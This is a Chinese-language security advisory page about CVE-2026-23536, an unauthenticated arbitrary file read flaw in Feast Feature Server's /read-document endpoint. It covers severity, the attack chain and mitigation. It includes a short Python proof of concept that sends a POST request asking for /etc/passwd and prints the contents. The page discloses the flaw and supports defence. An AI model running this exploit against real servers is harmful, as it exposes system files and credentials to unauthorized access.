IPBUF安全漏洞报告
English
CVE-2026-23536 CVSS 7.5 高危

CVE-2026-23536 Feast Feature Server 任意文件读取漏洞

披露日期: 2026-03-20

漏洞信息

漏洞编号
CVE-2026-23536
漏洞类型
任意文件读取
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Feast Feature Server

相关标签

CVE-2026-23536任意文件读取Feast高危漏洞未授权访问

漏洞概述

Feast Feature Server的`/read-document`端点存在安全漏洞。未经身份验证的远程攻击者可利用该漏洞,通过发送特制的HTTP POST请求,绕过访问限制,读取服务器进程权限下的任意文件。这可能导致敏感系统文件、应用程序配置及凭据泄露,对机密性构成严重影响。

技术细节

该漏洞源于Feast Feature Server在处理`/read-document`端点的请求时,未能正确验证和处理用户输入的文件路径参数。由于缺乏严格的访问控制检查和路径过滤,未经身份验证的攻击者可以通过构造包含特定路径遍历序列(如`../`)或绝对路径的恶意HTTP POST请求,直接读取Web服务器用户权限可访问的任意文件。攻击过程无需用户交互,利用难度较低。一旦利用成功,攻击者能够窃取包含敏感信息的配置文件(如数据库凭证、API密钥)、源代码或系统关键文件,为进一步的横向移动或系统提权奠定基础。该漏洞属于典型的服务端请求伪造或路径遍历类缺陷,严重影响了数据的机密性。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络或目标,发现开放的Feast Feature Server服务及其`/read-document`端点。
STEP 2
2. 漏洞利用
攻击者构造恶意的HTTP POST请求,在请求体中指定目标系统敏感文件(如/etc/passwd或配置文件)的路径。
STEP 3
3. 数据窃取
服务器处理请求并返回文件内容,攻击者获取敏感信息,可能导致进一步的身份凭证窃取或系统入侵。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Define the target URL (replace with actual target) target_url = "http://localhost:8080/read-document" # Malicious payload attempting to read /etc/passwd payload = { "path": "/etc/passwd" } try: # Send POST request without authentication response = requests.post(target_url, json=payload, timeout=10) # Check if the request was successful if response.status_code == 200: print("[+] Exploit successful! File content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Feast Feature Server (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界防火墙或应用防火墙(WAF)上禁用或拦截对`/read-document`接口的访问请求,并严格限制服务器进程的文件系统读取权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表